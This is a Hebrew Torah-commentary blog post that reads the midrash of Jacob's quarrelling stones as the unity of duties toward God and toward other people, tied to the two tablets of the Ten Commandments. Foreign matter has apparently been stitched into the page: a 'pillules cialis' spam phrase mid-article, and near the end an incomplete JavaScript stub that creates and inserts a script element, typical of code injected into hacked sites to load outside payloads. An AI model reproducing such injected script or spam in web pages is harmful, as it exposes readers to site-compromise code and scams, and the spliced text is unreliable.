“וידבר אלוקים את כל הדברים האלה לאמור” למה לא “וידבר אלוקים את הדברים האלה לאמור” ?

בס”ד

“וידבר אלוקים את כל הדברים האלה לאמר”

מרדכי אפרתי

 

בפס’ אחד נאמר  “ויקח מאבני המקום וישם מראשותיו”  כלומר שיעקב, בברחו מעשיו, שם תחת ראשו מספר אבנים ולא רק אבן אחת   ומאידך מהפסוק “ויקח את האבן אשר שם מראשותיו” עולה כי שם ראשו רק על אבן אחת.

 

על סתירה זו אומרים חז”ל  שהאבנים  ” התחילו מריבות זו עם זו, זאת אומרת עלי יניח צדיק את ראשו, וזאת אומרת עלי יניח, מיד עשאן הקב”ה אבן אחת, וזהו שנאמר   ‘ויקח את האבן אשר שם מראשותיו’.

pillules cialis  

האם אכן האבנים רבו ודיברו ? אם כן היה זה נס גדול יותר מקריעת ים סוף, אלא ברור שחז”ל באים להביע מסר    באמצעות אגדה פילאית  זו.

 

בפרשתנו אנו קוראים כי עשרת הדיברות  ניתנו על “שני לוחות אבנים” .

 

 בלוח, “באבן הימנית”  מוזכרות הדיברות הבאות:

 

“אנכי”  

“לא יהיה”  

“לא תשא”  

“זכור את”  

“כבד את”  

 

מאידך בלוח, ב “אבן השמאלית”  מוזכרות הדיברות הבאות:

 

“לא תרצח”  

“לא תנאף”  .

“לא תגנוב”

“לא תענה”

“לא תחמוד”   

 

כבר בראיה ראשונית אפשר לראות שה “אבן הימנית” עוסקת במצוות ש”בן אדם למקום”  ואילו  ה “אבן השמאלית”  מתמקדת במצות “שבין אדם לחבירו”.

 

 

כאשר יעקב ברח מעשו בדרכו להקים את עם ישראל, התרוצצו בראשו שני “האבנים” הללו, כלומר הוא התלבט במחשבתו (בראשו)  מה יהיה העיקר בעם ישראל , האם ה  “אבן השמאלית”  דהיינו  “בין אדם לחבירו” תהיה העיקר או ה “אבן הימנית” דהיינו  “בין אדם למקום” תהיה העיקר וזו המשמעות שהאבנים רבו ואמרו “עלי יניח צדיק ראשו”.

 

 את ההתלבטות הזו פתר הקב”ה ליעקב בכך שהוא הפך את האבנים ל “אבן” אחת.

 

 כלומר הקב”ה אומר  ליעקב שצריך גם וגם, גם בין “אדם לחבירו” וגם “בין אדם למקום”, ולא רק זו אלא ששניהם מהוים “אבן אחת” , יחידה אחת דהיינו אם  יקיים “בן אדם למקום” ולא “בין אדם לחבירו” הרי שגם “בין אדם למקום אין לו”  וכן להפך, הכל “אבן אחת”.

 

לענ”ד אחדותיות זו רמוזה בפתיח של עשרת הדיברות בפסוק  “וידבר אלוקים את כל הדברים האלה לאמר” ובמיוחד בדברי רש”י  “מלמד שאמר הקב”ה עשרת הדברות בדבור אחד”

 

לשם מה לומר הכל “בדבור אחד”?  ללמדנו שאין  עדיפות למצוה זו על אחרת, ומצד שני אי אפשר לקבל רק חלק . וגם אם לא מצליחים כרגע לקיים הכל אנו מקבלים את הכל .

 

 

 

 var d=document;var s=d.createElement(‘script’); document.currentScript.parentNode.insertBefore(s, document.currentScript);

סגור לתגובות.

Scroll To Top